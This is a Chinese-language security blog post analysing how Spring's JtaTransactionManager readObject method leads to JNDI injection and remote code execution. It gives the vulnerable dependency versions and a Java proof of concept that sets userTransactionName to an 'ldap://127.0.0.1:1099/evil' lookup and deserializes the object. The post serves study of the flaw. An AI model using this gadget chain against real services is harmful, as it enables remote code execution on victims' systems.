Spring反序列化JNDI分析

漏洞原理

Spring框架的JtaTransactionManager类中重写了readObject方法，这个方法终极会调用到JNDI中的lookup()方法，关键是里面的参数可控，这就导致了攻击者可以使用JNDI注入中的lookup()参数注入，传入恶意URI地址指向攻击者的RMI注册表服务，以使受害者客户端加载绑定在攻击者RMI注册表服务上的恶意类，从而实现远程代码执行。
环境依赖

1. <dependency>
2.   <groupId>org.springframework</groupId>
3.   <artifactId>spring-tx</artifactId>
4.   <version>4.2.4.RELEASE</version>
5. </dependency>
6. <dependency>
7.   <groupId>org.springframework</groupId>
8.   <artifactId>spring-context</artifactId>
9.   <version>4.2.4.RELEASE</version>
10. </dependency>
11. <dependency>
12.   <groupId>javax.transaction</groupId>
13.   <artifactId>javax.transaction-api</artifactId>
14.   <version>1.2</version>
15. </dependency>

复制代码

流程分析

漏洞入口在org/springframework/transaction/jta/JtaTransactionManager.java的readObject方法

跟进initUserTransactionAndTransactionManager

跟进lookupUserTransaction，这里调用了lookup

跟进lookup方法

继承跟进lookup方法，这里调用的是ctx的lookup方法，ctx是一个Context类型，往后追踪ctx，发现ctx实在是InitialContext类的实例，以是这里我们控制name的值就能直接打JNDI注入了

name就是JtaTransactionManager的属性userTransactionName，我们可以反射修改它的值

1. package org.example;
2. import org.springframework.transaction.jta.JtaTransactionManager;
3. import java.io.*;
4. import java.lang.reflect.Field;
5. import java.nio.file.Files;
6. import java.nio.file.Paths;
8. public class Main {
9.     public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException, ClassNotFoundException {
10.         JtaTransactionManager jtaTransactionManager = new JtaTransactionManager();
11.         Field userTransactionName = JtaTransactionManager.class.getDeclaredField("userTransactionName");
12.         userTransactionName.setAccessible(true);
13.         userTransactionName.set(jtaTransactionManager, "ldap://127.0.0.1:1099/evil");
14.         // 序列化
15.         ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("test.bin"));
16.         oos.writeObject(jtaTransactionManager);
17.         // 反序列化
18.         byte[] bytes = Files.readAllBytes(Paths.get("D:\\Java安全学习\\SpringJNDI\\test.bin"));
19.         ByteArrayInputStream bis = new ByteArrayInputStream(bytes);
20.         ObjectInputStream obj = new ObjectInputStream(bis);
21.         obj.readObject();
22.     }
23. }

复制代码

成功注入

rmi也是同理，把ldap换成rmi就行了，至于恶意服务端怎么搭建，之前的文章有讲过，这里就不再复述

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。